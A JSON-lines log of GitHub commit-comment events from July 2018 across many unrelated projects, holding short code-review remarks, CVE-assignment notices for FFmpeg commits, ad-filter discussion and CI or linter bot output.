{"id":"7988506551","type":"CommitCommentEvent","actor":{"login":"FireBurn"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":29762897,"position":null,"line":null,"path":null,"commit_id":"f404e31c77e75199b8d88ef0177b852401e96b7f","created_at":"2018-07-19T11:18:36Z","updated_at":"2018-07-19T11:18:36Z","author_association":"CONTRIBUTOR","body":"The patch for NPM is wrong, at least for newer versions of nodejs\r\n\r\nhttps://bugs.gentoo.org/660450"}},"created_at":"2018-07-19T11:18:36Z"}
{"id":"7988509099","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29762902,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-19T11:19:10Z","updated_at":"2018-07-19T11:19:10Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T11:19:10Z"}
{"id":"7988512590","type":"CommitCommentEvent","actor":{"login":"HongxuChen"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29762908,"position":null,"line":null,"path":null,"commit_id":"3a2d21bc5f97aa0161db3ae731fc2732be6108b8","created_at":"2018-07-19T11:19:58Z","updated_at":"2018-07-19T11:19:58Z","author_association":"NONE","body":"Assigned to [CVE-2018-14394](https://nvd.nist.gov/vuln/detail/CVE-2018-14394) ."}},"created_at":"2018-07-19T11:19:58Z"}
{"id":"7988516448","type":"CommitCommentEvent","actor":{"login":"HongxuChen"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29762914,"position":null,"line":null,"path":null,"commit_id":"fa19fbcf712a6a6cc5a5cfdc3254a97b9bce6582","created_at":"2018-07-19T11:20:50Z","updated_at":"2018-07-19T11:20:50Z","author_association":"NONE","body":"Asssigned to [CVE-2018-14395](https://nvd.nist.gov/vuln/detail/CVE-2018-14395) ."}},"created_at":"2018-07-19T11:20:50Z"}
{"id":"7988518610","type":"CommitCommentEvent","actor":{"login":"guoguo12"},"repo":{"name":"guoguo12/billboard-charts"},"payload":{"comment":{"id":29762922,"position":82,"line":221,"path":"billboard.py","commit_id":"fcfc48593e478b011a9ef8c00804354827ebf00e","created_at":"2018-07-19T11:21:18Z","updated_at":"2018-07-19T11:21:18Z","author_association":"OWNER","body":"Would prefer you explicitly check for the \"NEW\" badge. "}},"created_at":"2018-07-19T11:21:18Z"}
{"id":"7988518917","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29762923,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T11:21:23Z","updated_at":"2018-07-19T11:21:23Z","author_association":"MEMBER","body":"> ||piguiqproxy.com^$xmlhttprequest,redirect=nooptext\r\n\r\nJust found out this does not work, this is actually a bug -- just this one should work theoretically. Need to fix this.\r\n\r\nAnyway, problem is Firefox does not allow to redirect xmlhttprequest to `data:` URI, hence the need to outright remove the offending inline script from the response data with the `##^` filter."}},"created_at":"2018-07-19T11:21:23Z"}
{"id":"7988519327","type":"CommitCommentEvent","actor":{"login":"arnold-almeida"},"repo":{"name":"ryanwiemer/gatsby-starter-gcn"},"payload":{"comment":{"id":29762924,"position":null,"line":null,"path":null,"commit_id":"7f22027945022d4a629c17f2354b75312ea02cad","created_at":"2018-07-19T11:21:28Z","updated_at":"2018-07-19T11:21:28Z","author_association":"NONE","body":"Hey @brandonkal \r\n\r\nA `yarn.lock` file is specifically useful for ensuring consistent package dependencies across multiple environments.\r\n\r\nThis commit also creates a gotcha on `netlify` which depends on the `yarn.lock` for users who wish to use yarn.\r\n\r\nI would recommend NOT ignoring `yarn-error.log` + `package-lock.json`\r\n"}},"created_at":"2018-07-19T11:21:28Z"}
{"id":"7988561070","type":"CommitCommentEvent","actor":{"login":"bhAi111"},"repo":{"name":"markheramis/EasyDB"},"payload":{"comment":{"id":29763019,"position":900,"line":261,"path":"class-EasyDB.php","commit_id":"e3f16cdb4136c8c624be3faa1d908507b4c23809","created_at":"2018-07-19T11:30:37Z","updated_at":"2018-07-19T11:30:37Z","author_association":"CONTRIBUTOR","body":"Warning: mysqli_free_result() expects parameter 1 to be mysqli_result, null given in C:\\wamp64\\www\\WebDevProject\\EasyDB\\class-EasyDB.php on line 262\r\n\r\nProblematic, di nya ma capture ang exception."}},"created_at":"2018-07-19T11:30:37Z"}
{"id":"7988564135","type":"CommitCommentEvent","actor":{"login":"ergomorphic"},"repo":{"name":"ScorexFoundation/sigmastate-interpreter"},"payload":{"comment":{"id":29763021,"position":20,"line":149,"path":"docs/wpaper/sigma.tex","commit_id":"d336e810d6cd106bb150479d59d696b75658edd9","created_at":"2018-07-19T11:31:16Z","updated_at":"2018-07-19T11:31:16Z","author_association":"COLLABORATOR","body":"@reyzin see examples at the end. https://github.com/ScorexFoundation/sigmastate-interpreter/blob/master/docs/LangSpec.md  \r\nThis is how I planned to declare environment variables in the script itself.\r\nBut, it require to have a type of proofs (called Sigma in the examples). \r\nIn #195 I added support of this types.\r\nAfter it will be accepted, I can add `guard ...` construct.\r\nIn any case actuall substitution of values for each such environment variable is the responsibility of runtime (caller of contract).\r\n/cc @kushti "}},"created_at":"2018-07-19T11:31:16Z"}
{"id":"7988575783","type":"CommitCommentEvent","actor":{"login":"Stophface"},"repo":{"name":"react-community/react-native-maps"},"payload":{"comment":{"id":29763051,"position":12,"line":20,"path":"lib/android/src/main/java/com/airbnb/android/react/maps/AirMapView.java","commit_id":"2d760e19b111ba2721ca8f6dfde9e4339939ff1f","created_at":"2018-07-19T11:33:53Z","updated_at":"2018-07-19T11:33:53Z","author_association":"CONTRIBUTOR","body":"@stobis Wasn't me. @rborn ?"}},"created_at":"2018-07-19T11:33:53Z"}
{"id":"7988580707","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29763063,"position":null,"line":null,"path":null,"commit_id":"d44b4284fdbf752f412e05a218803d96fd1617e0","created_at":"2018-07-19T11:35:00Z","updated_at":"2018-07-19T11:35:00Z","author_association":"NONE","body":"Hey @flyinghead, I successfully backported this to both the OIT and non-OIT renderers.\r\n\r\nOne big problem though. While it does work, whenever i select 'Close Content' in RetroArch to shutdown the core or I try to press 'Escape' in order to exit RetroArch, the application now hangs. Is something not being freed at exit, or is there some thread causing a deadlock?"}},"created_at":"2018-07-19T11:35:00Z"}
{"id":"7988581739","type":"CommitCommentEvent","actor":{"login":"ergomorphic"},"repo":{"name":"ScorexFoundation/sigmastate-interpreter"},"payload":{"comment":{"id":29763066,"position":32,"line":161,"path":"docs/wpaper/sigma.tex","commit_id":"d336e810d6cd106bb150479d59d696b75658edd9","created_at":"2018-07-19T11:35:15Z","updated_at":"2018-07-19T11:35:15Z","author_association":"COLLABORATOR","body":"@reyzin it should work, otherwise it is a bug."}},"created_at":"2018-07-19T11:35:15Z"}
{"id":"7988587083","type":"CommitCommentEvent","actor":{"login":"UsmanAfzal"},"repo":{"name":"naseberry/parliament.uk-pugin"},"payload":{"comment":{"id":29763077,"position":1,"line":1,"path":"node-version","commit_id":"17ff5388305fd46150b7cfc9bf58a4d5ab1d6b07","created_at":"2018-07-19T11:36:27Z","updated_at":"2018-07-19T11:36:27Z","author_association":"NONE","body":"Let's use 8.11.3 the current LTS"}},"created_at":"2018-07-19T11:36:27Z"}
{"id":"7988587396","type":"CommitCommentEvent","actor":{"login":"OtherCrashOverride"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29763079,"position":null,"line":null,"path":null,"commit_id":"004c925f730c2b411df2d28666c8dcdc809f3adf","created_at":"2018-07-19T11:36:32Z","updated_at":"2018-07-19T11:36:32Z","author_association":"OWNER","body":"The LCD has to be initialized before it can be used to display an error condition."}},"created_at":"2018-07-19T11:36:32Z"}
{"id":"7988587499","type":"CommitCommentEvent","actor":{"login":"Sothatsit"},"repo":{"name":"Ben-Mann/evald"},"payload":{"comment":{"id":29763081,"position":207,"line":297,"path":"src/net/benmann/evald/Evald.java","commit_id":"0a651beb55e18c6aafeff982da0406b3ef4eb015","created_at":"2018-07-19T11:36:34Z","updated_at":"2018-07-19T11:36:34Z","author_association":"NONE","body":"Hey Ben, I've added `undeclaredKeyMap.remove(token)` here, so as to keep undeclaredKeyMap updated as you add variables. "}},"created_at":"2018-07-19T11:36:34Z"}
{"id":"7988605201","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29763126,"position":8,"line":11,"path":"src/main/resources/spring-context.xml","commit_id":"ef8095cec9209bcc00a1b3db54d978a370637170","created_at":"2018-07-19T11:40:25Z","updated_at":"2018-07-19T11:40:25Z","author_association":"NONE","body":"А вот src/main как раз лучше не прописывать, когда будет jar - src никакого не будет. можно прсто написать /test.csv"}},"created_at":"2018-07-19T11:40:25Z"}
{"id":"7988612519","type":"CommitCommentEvent","actor":{"login":"aleksandarbirca"},"repo":{"name":"acailic/sveska"},"payload":{"comment":{"id":29763146,"position":null,"line":null,"path":null,"commit_id":"89940d4c55b6c10abcf57e5b624970c7eeb1a272","created_at":"2018-07-19T11:42:08Z","updated_at":"2018-07-19T11:42:08Z","author_association":"NONE","body":"Accepted, ship it! "}},"created_at":"2018-07-19T11:42:08Z"}
{"id":"7988618159","type":"CommitCommentEvent","actor":{"login":"aleksandarbirca"},"repo":{"name":"acailic/sveska"},"payload":{"comment":{"id":29763153,"position":8,"line":8,"path":"_notes/veseli-pozdrav.md","commit_id":"89940d4c55b6c10abcf57e5b624970c7eeb1a272","created_at":"2018-07-19T11:43:24Z","updated_at":"2018-07-19T11:43:24Z","author_association":"NONE","body":"Maybe you should add \"veliku legendu\" as well"}},"created_at":"2018-07-19T11:43:24Z"}
{"id":"7988618189","type":"CommitCommentEvent","actor":{"login":"OtherCrashOverride"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29763154,"position":null,"line":null,"path":null,"commit_id":"2f5462f283b576d8545ab6583cd4185b488e7572","created_at":"2018-07-19T11:43:24Z","updated_at":"2018-07-19T11:43:24Z","author_association":"OWNER","body":"This code base is deprecated and will be removed entirely in the future.  It has already been replaced in the smsplusgx branch.\r\n\r\nCode that is commented out but still present is typically still present for a reason such as \"extreme\" debugging.  It prevents having to repeatedly add and remove the same code when isolating issues.\r\n\r\nI concur that a log function needs to be implemented.  However, I feel it should be an abstraction rather than hardcoding with ESP_LOG."}},"created_at":"2018-07-19T11:43:24Z"}
{"id":"7988620233","type":"CommitCommentEvent","actor":{"login":"lainverse"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763160,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T11:43:51Z","updated_at":"2018-07-19T11:43:51Z","author_association":"NONE","body":"@gorhill \r\nIn RU AdList JS Fixes I've dealt with these domains by stopping requests entirely by overriding methods of XMLHttpRequest object which effectively prevents both onload and onerror events from being fired.\r\nThere is another way, though. They check how fast their request is blocked and if it happens under 300ms they destroy content of the page. So, if there would be a way to stall response past this threshold or indefinitely it should be possible to block their requests. Is it possible?"}},"created_at":"2018-07-19T11:43:51Z"}
{"id":"7988622187","type":"CommitCommentEvent","actor":{"login":"darealshinji"},"repo":{"name":"darealshinji/nanosvg"},"payload":{"comment":{"id":29763165,"position":null,"line":null,"path":null,"commit_id":"719cce03d0eebfdfe2feab0d94c99b4c9ffbcbeb","created_at":"2018-07-19T11:44:17Z","updated_at":"2018-07-19T11:44:17Z","author_association":"OWNER","body":"You may wanna ask the person I've copied this from: https://github.com/memononen/nanosvg/pull/63"}},"created_at":"2018-07-19T11:44:17Z"}
{"id":"7988629548","type":"CommitCommentEvent","actor":{"login":"ergomorphic"},"repo":{"name":"ScorexFoundation/sigmastate-interpreter"},"payload":{"comment":{"id":29763179,"position":59,"line":188,"path":"docs/wpaper/sigma.tex","commit_id":"d336e810d6cd106bb150479d59d696b75658edd9","created_at":"2018-07-19T11:45:52Z","updated_at":"2018-07-19T11:45:52Z","author_association":"COLLABORATOR","body":"@reyzin The precedence should be the same as in Scala (https://www.scala-lang.org/files/archive/spec/2.12/06-expressions.html, 6.12.3). Otherwise it is a bug, please report."}},"created_at":"2018-07-19T11:45:52Z"}
{"id":"7988631376","type":"CommitCommentEvent","actor":{"login":"BAAAKA"},"repo":{"name":"BAAAKA/Chessu"},"payload":{"comment":{"id":29763185,"position":null,"line":null,"path":null,"commit_id":"498205e7963f4f5875ce46d07cdfce027ad5c2bc","created_at":"2018-07-19T11:46:15Z","updated_at":"2018-07-19T11:46:15Z","author_association":"OWNER","body":"More* "}},"created_at":"2018-07-19T11:46:15Z"}
{"id":"7988631522","type":"CommitCommentEvent","actor":{"login":"theyusufyildiz"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29763186,"position":2,"line":2,"path":"spring-core/src/main/java/org/springframework/core/annotation/OrderUtils.java","commit_id":"4d3a899a53c6842a9dccede91170c25f90dc4451","created_at":"2018-07-19T11:46:17Z","updated_at":"2018-07-19T11:46:17Z","author_association":"NONE","body":"This is a test."}},"created_at":"2018-07-19T11:46:17Z"}
{"id":"7988632879","type":"CommitCommentEvent","actor":{"login":"tlambrou"},"repo":{"name":"Broaden-io/Broaden-io-server"},"payload":{"comment":{"id":29763190,"position":39,"line":39,"path":"migrations/20180702040716-MoreChangesToRubricModel.js","commit_id":"a916ca278102690d75a2efec0cebdd59368a93b6","created_at":"2018-07-19T11:46:35Z","updated_at":"2018-07-19T11:46:35Z","author_association":"COLLABORATOR","body":"Haha.  That'll break it!"}},"created_at":"2018-07-19T11:46:35Z"}
{"id":"7988633494","type":"CommitCommentEvent","actor":{"login":"OtherCrashOverride"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29763193,"position":null,"line":null,"path":null,"commit_id":"d8cd5beea88010590dd1553dbcf113823d492f63","created_at":"2018-07-19T11:46:44Z","updated_at":"2018-07-19T11:46:44Z","author_association":"OWNER","body":"PSRAM is a physically external chip connected to the same SPI bus as the external flash.\r\nhttps://www.espressif.com/sites/default/files/documentation/esp-psram64_esp-psram64h_datasheet_en.pdf"}},"created_at":"2018-07-19T11:46:44Z"}
{"id":"7988638244","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29763205,"position":16,"line":297,"path":"src/main/java/ml/duncte123/skybot/CommandManager.java","commit_id":"433123cb4cd93f37613ff88a4c3532aea6ffb7ae","created_at":"2018-07-19T11:47:44Z","updated_at":"2018-07-19T11:47:44Z","author_association":"MEMBER","body":"We could get the guild from the text channel fine"}},"created_at":"2018-07-19T11:47:44Z"}
{"id":"7988638651","type":"CommitCommentEvent","actor":{"login":"Niols"},"repo":{"name":"colis-anr/morbig"},"payload":{"comment":{"id":29763208,"position":100,"line":100,"path":"tests/good/2.7-redirection/2.7.4-here-document/for_loop_here_document.sh.expected","commit_id":"816ea4c6c7bd2375744d3c472ea73fe759c6540e","created_at":"2018-07-19T11:47:49Z","updated_at":"2018-07-19T11:47:49Z","author_association":"MEMBER","body":"`DATA` is the end of the here-document here. Is that on purpose that it ends up in the word?"}},"created_at":"2018-07-19T11:47:49Z"}
{"id":"7988638898","type":"CommitCommentEvent","actor":{"login":"DivvyK"},"repo":{"name":"DivvyK/hello-world"},"payload":{"comment":{"id":29763209,"position":null,"line":null,"path":null,"commit_id":"69faa3a6d7388c515a3ba8a2ed68d5620fb66b27","created_at":"2018-07-19T11:47:53Z","updated_at":"2018-07-19T11:47:53Z","author_association":"OWNER","body":"Initiation - where does it come from\r\nIneffable - where does it come from"}},"created_at":"2018-07-19T11:47:53Z"}
{"id":"7988639212","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29763210,"position":22,"line":303,"path":"src/main/java/ml/duncte123/skybot/CommandManager.java","commit_id":"433123cb4cd93f37613ff88a4c3532aea6ffb7ae","created_at":"2018-07-19T11:47:57Z","updated_at":"2018-07-19T11:47:57Z","author_association":"MEMBER","body":"Why clear twice?"}},"created_at":"2018-07-19T11:47:57Z"}
{"id":"7988639915","type":"CommitCommentEvent","actor":{"login":"DivvyK"},"repo":{"name":"DivvyK/hello-world"},"payload":{"comment":{"id":29763211,"position":null,"line":null,"path":null,"commit_id":"69faa3a6d7388c515a3ba8a2ed68d5620fb66b27","created_at":"2018-07-19T11:48:06Z","updated_at":"2018-07-19T11:48:06Z","author_association":"OWNER","body":"Starting jitters"}},"created_at":"2018-07-19T11:48:06Z"}
{"id":"7988641412","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29763222,"position":null,"line":null,"path":null,"commit_id":"2f5462f283b576d8545ab6583cd4185b488e7572","created_at":"2018-07-19T11:48:26Z","updated_at":"2018-07-19T11:48:26Z","author_association":"NONE","body":"I don't understand what does `an abstraction` mean in your last sentence.\r\n\r\nCan you document what your branch does and your plan in wiki? That will help other's to pick which branch to work on."}},"created_at":"2018-07-19T11:48:26Z"}
{"id":"7988647818","type":"CommitCommentEvent","actor":{"login":"yurug"},"repo":{"name":"colis-anr/morbig"},"payload":{"comment":{"id":29763233,"position":100,"line":100,"path":"tests/good/2.7-redirection/2.7.4-here-document/for_loop_here_document.sh.expected","commit_id":"816ea4c6c7bd2375744d3c472ea73fe759c6540e","created_at":"2018-07-19T11:49:50Z","updated_at":"2018-07-19T11:49:50Z","author_association":"CONTRIBUTOR","body":"That is bug. Please open an issue."}},"created_at":"2018-07-19T11:49:50Z"}
{"id":"7988648941","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29763236,"position":5,"line":52,"path":"src/main/resources/logback.groovy","commit_id":"433123cb4cd93f37613ff88a4c3532aea6ffb7ae","created_at":"2018-07-19T11:50:06Z","updated_at":"2018-07-19T11:50:06Z","author_association":"MEMBER","body":"Can I put the level in brackets?\r\n"}},"created_at":"2018-07-19T11:50:06Z"}
{"id":"7988649199","type":"CommitCommentEvent","actor":{"login":"Cookizz"},"repo":{"name":"teambition/yykEmoji"},"payload":{"comment":{"id":29763237,"position":null,"line":null,"path":null,"commit_id":"a0e691b0bea9a8d371c988a045ad0a52af0a9e64","created_at":"2018-07-19T11:50:10Z","updated_at":"2018-07-19T11:50:10Z","author_association":"NONE","body":"👍"}},"created_at":"2018-07-19T11:50:10Z"}
{"id":"7988649374","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29763238,"position":null,"line":null,"path":null,"commit_id":"3424a8ead1c998a7284dc9f9ae95cbd9e7ad73d6","created_at":"2018-07-19T11:50:12Z","updated_at":"2018-07-19T11:50:12Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180719-115010 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180719-115010\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-19T11:50:12Z"}
{"id":"7988649620","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"ganlanyuan/tiny-slider"},"payload":{"comment":{"id":29763239,"position":null,"line":null,"path":null,"commit_id":"fd306a1b4a56bf4fc6da705ba90ac963f4b6eccf","created_at":"2018-07-19T11:50:15Z","updated_at":"2018-07-19T11:50:15Z","author_association":"CONTRIBUTOR","body":"doing such a change in a minor release is not a good idea.\r\n\r\napi changes which are not backwards compatible should only be part of new major versions."}},"created_at":"2018-07-19T11:50:15Z"}
{"id":"7988650012","type":"CommitCommentEvent","actor":{"login":"thomasjpfan"},"repo":{"name":"docker-flow/docker-flow-monitor"},"payload":{"comment":{"id":29763240,"position":234,"line":651,"path":"server/server.go","commit_id":"aeacdf5910b95c4279728006536b94404136a578","created_at":"2018-07-19T11:50:20Z","updated_at":"2018-07-19T11:50:20Z","author_association":"COLLABORATOR","body":"You only need to set `DF_INCLUDE_NODE_IP_INFO=true` in DFSL to used `DF_SCRAPE_TARGET_LABELS`. \r\n\r\nIf you have any other questions, please open an issue."}},"created_at":"2018-07-19T11:50:20Z"}
{"id":"7988650822","type":"CommitCommentEvent","actor":{"login":"tlambrou"},"repo":{"name":"Broaden-io/Broaden-io-server"},"payload":{"comment":{"id":29763241,"position":39,"line":39,"path":"migrations/20180702040716-MoreChangesToRubricModel.js","commit_id":"a916ca278102690d75a2efec0cebdd59368a93b6","created_at":"2018-07-19T11:50:31Z","updated_at":"2018-07-19T11:50:31Z","author_association":"COLLABORATOR","body":"I changed it."}},"created_at":"2018-07-19T11:50:31Z"}
{"id":"7988652650","type":"CommitCommentEvent","actor":{"login":"h-huss"},"repo":{"name":"viadee/sonarQuest"},"payload":{"comment":{"id":29763246,"position":null,"line":null,"path":null,"commit_id":"75713caebd7792b4d3c022d580ec9ae4c7e356d4","created_at":"2018-07-19T11:50:54Z","updated_at":"2018-07-19T11:50:54Z","author_association":"CONTRIBUTOR","body":"Sure, but his password will stand in the logs, in cleartext."}},"created_at":"2018-07-19T11:50:54Z"}
{"id":"7988655337","type":"CommitCommentEvent","actor":{"login":"jadrum"},"repo":{"name":"jadrum/RestaurantManager"},"payload":{"comment":{"id":29763257,"position":30,"line":41,"path":"src/containers/login/register.js","commit_id":"6c2bb88847c10245a32cb689748ce4871f12a014","created_at":"2018-07-19T11:51:30Z","updated_at":"2018-07-19T11:51:30Z","author_association":"OWNER","body":"this function does not need to be within the submit function"}},"created_at":"2018-07-19T11:51:30Z"}
{"id":"7988655477","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":29763259,"position":null,"line":null,"path":null,"commit_id":"d6a01a5dfc453cd3d39967bde242719ef79b0436","created_at":"2018-07-19T11:51:32Z","updated_at":"2018-07-19T11:51:32Z","author_association":"NONE","body":"[R/irlba.R:132:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/irlba.R#L132) *style:* **Lines should not be more than 130 characters.**\n```r\n​#' Baglama, James, and Lothar Reichel. \"Augmented implicitly restarted Lanczos bidiagonalization methods.\" SIAM Journal on Scientific Computing 27.1 (2005): 19-42.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:15:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L15) *style:* **Lines should not be more than 130 characters.**\n```r\n​#' @param tol Convergence is determined when \\eqn{\\|U_j - U_{j-1}\\|_F < tol}{||U_j - U_{j-1}||_F < tol}, where \\eqn{U_j} is the matrix of estimated left regularized singular vectors at iteration \\eqn{j}.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:106:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L106) *style:* **Lines should not be more than 130 characters.**\n```r\n​#'   \\item{Shen, Haipeng, and Jianhua Z. Huang. \"Sparse principal component analysis via regularized low rank matrix approximation.\" Journal of multivariate analysis 99.6 (2008): 1015-1034.}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:107:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L107) *style:* **Lines should not be more than 130 characters.**\n```r\n​#'   \\item{Witten, Tibshirani and Hastie (2009) A penalized matrix decomposition, with applications to sparse principal components and canonical correlation analysis. _Biostatistics_ 10(3): 515-534.}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:201:51:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L201) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    lambda <<- vapply(seq(length(p)), function(j) (1 - alpha) * z[p[j], j] + alpha * z[p[j] + 1, j], pi, USE.NAMES=FALSE)\n                                                  ^\n```\n[R/ssvd.R:222:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L222) *style:* **Lines should not be more than 130 characters.**\n```r\n​    s$u <- sweep(s$u, 2, apply(xsv, 2, function(x) sign(head(x[x!=0], 1))) / apply(s$u, 2, function(x) sign(head(x[x!=0], 1))), `*`)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T11:51:32Z"}
{"id":"7988655874","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":29763260,"position":null,"line":null,"path":null,"commit_id":"d6a01a5dfc453cd3d39967bde242719ef79b0436","created_at":"2018-07-19T11:51:37Z","updated_at":"2018-07-19T11:51:37Z","author_association":"NONE","body":"[R/irlba.R:132:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/irlba.R#L132) *style:* **Lines should not be more than 130 characters.**\n```r\n​#' Baglama, James, and Lothar Reichel. \"Augmented implicitly restarted Lanczos bidiagonalization methods.\" SIAM Journal on Scientific Computing 27.1 (2005): 19-42.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:15:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L15) *style:* **Lines should not be more than 130 characters.**\n```r\n​#' @param tol Convergence is determined when \\eqn{\\|U_j - U_{j-1}\\|_F < tol}{||U_j - U_{j-1}||_F < tol}, where \\eqn{U_j} is the matrix of estimated left regularized singular vectors at iteration \\eqn{j}.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:106:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L106) *style:* **Lines should not be more than 130 characters.**\n```r\n​#'   \\item{Shen, Haipeng, and Jianhua Z. Huang. \"Sparse principal component analysis via regularized low rank matrix approximation.\" Journal of multivariate analysis 99.6 (2008): 